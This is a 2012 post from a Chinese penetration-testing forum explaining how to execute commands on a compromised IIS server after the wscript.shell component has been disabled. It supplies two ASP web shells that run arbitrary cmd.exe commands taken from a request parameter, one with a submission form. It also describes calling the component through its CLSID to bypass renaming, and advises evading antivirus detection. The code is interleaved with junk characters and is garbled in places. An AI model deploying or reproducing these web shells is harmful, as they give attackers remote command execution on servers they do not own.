找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2759|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
    / U# l2 h! o! {7 H
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。0 N) m, k4 \% ^& W$ t
  • 要想让运行命令可以试试这种方法,成功率为五五之数。
    " r8 q4 C# [" J0 Y& m/ X/ Z) p
  • 把下面代码复制:) H( A- z4 X3 N8 F2 _7 g
  • <%4 R, r! g1 q" t# U- G
  • end if. v: k2 z4 I# ^  ^
  • response.write(”")  ~& v4 @$ E/ C0 ?# @# T* W
  • On Error Resume ) Z; G! F: y0 w
  • Next" o1 {* T. K$ p2 e; |3 a
  • response.write oScriptlhn.exec(”cmd.exe /c” & ! h% r9 u- p" {& \) V
  • request(”c”)).stdout.readall
    9 _! H- o2 s" J) G* i0 e8 Z
  • response.write(”")
    * Q6 ]! z$ m7 \( _$ D" z8 X
  • response.write(”")
    8 k$ o3 u7 ]4 M' O
  • response.write(”) }2 L: l$ ^1 L1 ]. W( _
  • “)% A6 ^7 @: M4 J. j* v5 k
  • response.write(”")
    ( W& u1 W4 k: t
  • %>7 O# N1 ]/ K% W/ u& p& J% N
  • 保存为一个asp文件,然后传到网站目录上去
    * a" y4 r1 v# n: g
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
    " W6 s* o9 u+ T; O" T! D9 j
  • 我用此成功运行过cacls命令。2 b) E. i9 r3 o9 d
  • 第二那就是运行时出错,可能限制某些代码执行
    * l4 `% b5 x' b3 D0 o! S
  • 无wscript.shell组件提权又一个方法
    # B+ w% e1 F- ~- y! [6 \* c
  • <object runat=server id=oScriptlhn scope=page / Z6 N! _  }* F7 p% g
  • , i7 B; p1 L, P  Z# W; P
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>3 v4 Y/ A) k5 h( \
  • <%if err then%>
    6 |( |! H- B" n" I3 h/ w5 j! _
  • <object runat=server id=oScriptlhn scope=page
    / G  m! G3 v6 D4 x, x4 y, ]3 a

  • 4 M1 N: o1 g, X/ [1 C
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>: Z, t& Y( s, _! r+ t1 d
  • <% % ~' W  c$ w' H4 @2 m: m  J
  • end if * Q; D) B& P0 _* }) j7 F9 A
  • response.write(”<textarea readonly cols=80
    1 l. X0 [( Y  @

  • & z- w6 `/ C; R7 S; ?$ ^
  • rows=20>”)
    3 w( N9 h! w, o) W6 v
  • On Error Resume Next   K; T$ @, q6 I- S
  • response.write $ f/ j7 B* p2 h  n- Q
  • % x. e3 {. z" v$ U) ?  J
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
    ( n( N/ X: j3 q
  • response.write(”</textarea>”) ! ^( C' Z3 M# B- i! U+ _: f
  • response.write(”<form ; U; H  m6 x2 |, u& r/ Q9 K8 t* l

  • 9 L+ `  {7 b* h3 a- [
  • method=’post’>”)
    % X" \1 B& U( c2 ~
  • response.write(”<input type=text name=’c'
    3 q# E9 ~5 T6 h$ N% L0 V

  • + }0 v) Q6 i; O% ?
  • size=60><br>”) ; W+ M; W" n3 O& E6 M
  • response.write(”<input type=submit
    + Z7 U2 W1 k& t! h/ I1 p  |! S
  • * ?* g8 p4 l) t9 |
  • value=’执行’></form>”) ; ]& g% F8 S) ^4 v; {( E) {6 g
  • %>
    " D$ A( T* T# |; U
  • 保存为ASP,此代码可能被杀,请注意免杀。
    0 y4 E# Q  r  L* _8 c4 g- e
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建9 ?0 i/ \, T  A' R
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表